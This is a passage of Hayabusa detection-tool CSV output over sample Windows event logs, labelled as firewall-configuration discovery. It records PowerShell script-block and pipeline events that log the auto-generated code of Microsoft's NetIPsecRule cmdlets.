$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBo",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"undParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = 
$null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Enable-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_va",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) 
